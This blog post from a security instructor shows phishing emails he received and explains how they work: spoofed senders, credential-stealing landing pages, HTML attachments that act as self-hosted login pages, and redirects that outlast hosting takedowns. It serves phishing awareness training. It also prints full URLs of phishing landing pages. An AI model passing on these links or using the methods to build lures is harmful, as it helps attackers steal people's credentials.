Catch of the Day: Email Compromise Phish
Chef’s Special: Bank Statement Phish
Also serving: Voicemail Phish, FedEx Phish
Examples of clever phish that made it past my anti-spam nets and into my inbox. Some are contributed by clients or readers like you, and other reliable sources on the Internet.
You can send phishing samples to me at phish@wyzguys.com.
My intention is to provide a warning and show current examples of phishing scams, related articles, and education about how these scams and exploits work, and how to detect them in your inbox. If the pictures are too small or extend off the page, double clicking the image will display them in a photo viewer app.
Email “Comprise” Phish
If you are going to send phishing emails, at least make sure they are correctly spelled. While “comprise” is a word, it is not correct for this usage.
The email sender is an outlook.com account MAIL ADMINiSTRATOR <wheatsheafbakewell@outlook.com> Not sure who wheatsheafbakewell is but a quick search does find a restaurant of that name in the UK. The word ADMINiSTRATOR is missing a capital letter
The CANCEL REQUEST NOW link resolves to a weebly.com hosted web site at https://newdivers.weebly.com/ Using a legitimate commercial hosting platform is a fairly common way to deploy your phishing landing pages, and can make everything appear more credible.
This is a typical credential-stealing page.
A day later, as I write this on August 9, it seems the site has been taken down. This is one of the drawbacks of using a commercial site host such as Weebly. The phishing sites get taken down quickly, often in a matter of hours. Cybersecurity teams in action!
Bank Statement Phish
One way to get around the hosting problem we saw in the previous case is to send an email with an HTML attachment. When you open the attachment, your web browser displays a web page like the one below. Your own computer in essence, is the web server for this page
Here’s the email with the HTML attachment
And here is the credential stealing login page. If you look in the address bar, you can see the source is a file on the system at file:///mozilla_kali0/Bank_Statement_Report_0384783.html. In this instance, this is the Mozilla Firefox application on my Kali Linux virtual machine. There is no time limit on this sort of self-hosting exploit. The HTML attachment will work as long as the attacker maintains the server collecting the login credentials of their victims.
Voicemail Phish
And here is another example of the HTML attachment exploit.
Here are two landing pages. The first appears to be a CAPTCHA.
The second page is designed to capture my password. This page also uses my own logo to provide additional credibility. To bad it is a bit squashed.
FedEx Phish
This is the final phish for today. The sender address FedEx <support@servonline.com> looks more legitimate due to the use of the servonline.com email domain. Not fedex.com, but even big organizations sometime use other service providers.
The CLICK HERE TO UPDATE NOW link resolves to https://vwjccviyvjllfsbw-dot-s0cr-wr0xs-bri0cx-erssaq.ue.r.appspot.com/ This exploit is using an appspot.com hosting site, and was redirected to https://ipfs.io/ipfs/QmeikM3aPy1Ed85wGCsnEnHdA9hCXseR4HZpcaLhNPKz9t#undefined which is another commercial hosting site ipfs.io. The landing page looks completely authentic. This landing page was still working 5 days later, so the redirection must help with longevity.
Share
AUG
About the Author:
I am a cybersecurity and IT instructor, cybersecurity analyst, pen-tester, trainer, and speaker. I am an owner of the WyzCo Group Inc. In addition to consulting on security products and services, I also conduct security audits, compliance audits, vulnerability assessments and penetration tests. I also teach Cybersecurity Awareness Training classes. I work as an information technology and cybersecurity instructor for several training and certification organizations. I have worked in corporate, military, government, and workforce development training environments I am a frequent speaker at professional conferences such as the Minnesota Bloggers Conference, Secure360 Security Conference in 2016, 2017, 2018, 2019, the (ISC)2 World Congress 2016, and the ISSA International Conference 2017, and many local community organizations, including Chambers of Commerce, SCORE, and several school districts. I have been blogging on cybersecurity since 2006 at http://wyzguyscybersecurity.com